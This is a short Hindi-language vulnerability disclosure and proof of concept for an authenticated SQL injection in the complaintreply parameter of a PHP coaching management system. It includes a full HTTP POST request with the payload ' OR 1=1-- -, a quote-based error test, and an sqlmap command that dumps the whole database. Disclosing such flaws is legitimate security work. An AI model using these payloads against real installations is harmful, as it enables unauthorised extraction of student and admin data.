
प्रमाणित SQL इंजेक्शन के लिए प्रूफ ऑफ कॉन्सेप्ट Coaching Management System में, जो अस्वच्छित complaintreply पैरामीटर के माध्यम से डेटाबेस डंप का प्रदर्शन करता है।
PHP में बने कोचिंग मैनेजमेंट सिस्टम में SQL इंजेक्शन की भेद्यता मौजूद है। एडमिन रिप्लाई कार्यक्षमता में complaintreply पैरामीटर को SQL क्वेरी में उपयोग करने से पहले उचित रूप से सैनिटाइज़ नहीं किया जाता है। एक प्रमाणित हमलावर (एडमिन) दुर्भावनापूर्ण SQL क्वेरी इंजेक्ट कर सकता है, जिससे पूर्ण डेटाबेस निष्कर्षण संभव हो जाता है।
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
PHP में कोचिंग मैनेजमेंट सिस्टम https://code-projects.org/coaching-management-system-in-php-with-source-code/
अज्ञात (अप्रैल 2026 तक उपलब्ध नवीनतम संस्करण पर परीक्षण किया गया)
छात्र शिकायत दर्ज करता है 
एडमिन शिकायत खोलता है और रिप्लाई सुविधा तक पहुँचता है
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Burp Suite के माध्यम से अनुरोध इंटरसेप्ट करें 
पेलोड इंजेक्ट करें:
'

SQL त्रुटि देखी गई
7. इंजेक्शन की पुष्टि करें:
' OR 1=1-- -

निम्न का उपयोग करके डेटाबेस डंप करें:
sqlmap -r sqli.txt --dump

गंभीरता: क्रिटिकल